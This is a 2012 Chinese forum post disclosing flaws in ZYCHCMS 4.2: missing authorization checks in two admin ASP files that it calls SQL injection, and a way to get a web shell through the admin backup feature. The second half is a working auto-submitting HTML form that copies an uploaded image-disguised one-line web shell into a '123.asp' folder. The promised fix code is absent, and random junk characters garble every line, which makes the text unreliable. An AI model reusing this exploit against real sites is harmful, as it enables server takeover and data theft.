! {* m% [) u+ E. O$ R
. u. l2 |$ ? ]7 ^, k5 y
! D i) F% J# x( p) d) E* s ?: l# t: B7 W& {8 h) w2 I" N( H$ L4 J
影响版本:ZYCHCMS企业网站管理系统4.2(存在以下两个文件的版本应该是通杀)& D3 Y, d3 H& t* ^0 j
①SQL注射漏洞
! r" a& |8 L" W' J" R0 K 漏洞文件:/admin/add_js.asp & /admin/add_xm_jiang.asp. j: J1 T0 n" ~4 C- Y& S8 y
漏洞原因:未过滤/ P$ W8 [# R# y+ N2 L, k$ h
漏洞代码:7 f1 {. `2 U$ |. {
都是相同的,文件开头没有调用过滤文件/admin/seeion.asp,导致没有对当前权限进行判断,就直接操作数据库。 i3 G) x, I7 C. p6 U2 ?5 f. `
修复方法:在文件开头加入代码
! F k$ j. X) ~/ g0 J# v
& S" Y7 z+ p. X7 k8 Z! ?/ ?; s( W2 h0 M& x
②后台拿WBSHELL
( j6 t/ s% F$ I1 V 进入后台有一个数据库备份,可以通过本地提交突破创建.asp后缀文件夹,并将一句话备份进去。
9 n& A0 T! z6 \; `- `0 v 这里在网上找了一个,改了下,将就着用。
" d4 ]! d5 c8 k& w3 ]- c: J. Y; N! e; q0 } 以下是代码本地提交代码8 B I- H+ J! Z% n; a& z+ g" |
0 h- w" ?# m# h! c: Z& G
8 v4 E. n. H& F* m4 z<form method=”post” action=”http://localhost/admin/Manage_backup.asp?action=Backup” name=add>
2 I% I A: l. B3 I/ _" Y$ m7 p <!–eg:http://127.0.0.1:99/admin/Manage_backup.asp?action=Backup–>
. C5 Y2 k/ h8 Z5 N; [( c9 F <tr>. A/ t* @8 u* f7 T7 }2 c
<td height=”30″ background=”images/bg_list.gif”><div style=”padding-left:10px; font-weight:bold; color:#FFFFFF; text-align:left”>备份数据库</div></td>
0 U2 v8 v( r8 P7 T9 V/ F# a( b </tr>
3 a* X; I9 x. D5 S! I3 e E <tr>
2 n. S) ?; m! y, n <td bgcolor=”#FFFFFF”><span class=”back_southidc”>
- J1 b+ P, [+ h/ c6 N </span>! z4 e% R: `+ z( [/ E. x1 R
<table width=”100%” border=”0″ align=”center” cellpadding=”5″ cellspacing=”0″ >
* g- r: Q+ U( e& |1 u2 G" n <tr onmouseover=”style.backgroundColor=’#EEEEEE’” onmouseout=”style.backgroundColor=’#F1F5F8′” bgcolor=”#F1F5F8″ >
5 c% b* `0 `% r L, ^ <td height=”25″ width=”30%” class=”td”><div align=”left”>当前数据库路径</div></td>+ {4 z* ]( ?+ W# Z) _5 \. ~
<td width=”70%” class=”td”>90sec. K5 L9 v8 S8 d
3 m# U& o( m( C* t5 Z! n- Y) g <div align=”left”>
" g) B1 w' C) _( }7 [: E9 _& x. A <input type=”text” size=”30″ name=”DBpath” value=”此处为你在其网站上传的图片格式一句话路径” />% ?) q/ ]7 F1 h5 O
<!–eg:../uploadfile/image/Logo/20120803130885328532_ZYCH.jpg>/ C2 N' s: `8 d" Q
<input type=”hidden” size=”50″ name=”bkfolder” value=”123.asp” />
! i9 ~9 S9 o( E5 E3 X </div></td>6 g- t- G! T! g& B F$ z
</tr>
+ L6 ?- ^& t2 | <tr onmouseover=”style.backgroundColor=’#EEEEEE’” onmouseout=”style.backgroundColor=’#FFFFFF’” bgcolor=”#FFFFFF”>2 X v& A B' e7 w& S
<td height=”25″ width=”30%” class=”td”><div align=”left”>备份数据库名称</div></td>
1 n4 c) v6 y- g8 w3 u0 N <td class=”td”><div align=”left”>
' |6 z# ~- Y8 K <input type=”text” size=”30″ name=”bkDBname” value=”4.mdb” />
2 C4 y8 c; z. X [如备份目录有该文件,将覆盖,如沒有,将自动创建]</div></td>
% e7 f9 ^$ d O1 ]0 e </tr>
. R0 Y: y6 X* |# y8 f <tr onmouseover=”style.backgroundColor=’#EEEEEE’” onmouseout=”style.backgroundColor=’#F1F5F8′” bgcolor=”#F1F5F8″>5 d+ U4 r; o$ j, h
<td height=”25″ width=”30%” class=”td”><div align=”left”></div></td>
6 S+ Y3 e5 J M2 D, b <td class=”td”><div align=”left”>
8 @- [& l F! x: q# F <input type=”submit” value=”确定备份” class=”btn”
4 k6 z2 \& E8 ]/ X1 T% p </div></td>" i' G& T i8 O
</tr>
( O: _4 b- l7 U& U+ {2 ^ </table></td></tr></form>
! W( J! K0 B, R4 i {: Z </table>
& s t! Q U% J' _3 o& g0 a </td>$ {* c9 J$ A' b, V3 N
</tr># G% H5 c. Q8 E5 O- @
</table>
' T" t4 l, S# |; ^7 C+ ~4 A9 h <script>6 N- O [# i0 Y) E
document.all.add.submit();0 l, v! @8 w, O* X# q! O! E# ^
</script>/ j5 d3 ^8 s+ p4 ^) Y2 Y) }
3 x5 Q0 g5 ? E* h) e& G/ o, [
1 Q; l3 E7 h8 i- H' Q9 _1 {( ? e0 E0 Q0 {8 _
" T. ~. m) h* X0 _" l( E
- H- a) N2 q8 O6 v! Q
* R) a; y! O2 H2 L
: u% E3 [) |' k: I9 Z
2 v: n3 t5 m- k0 @& f
$ z p9 u3 {; t% Y8 |* P/ l, T* o/ y, A
|
发表于 2012-9-10 21:09:51
收藏
支持
反对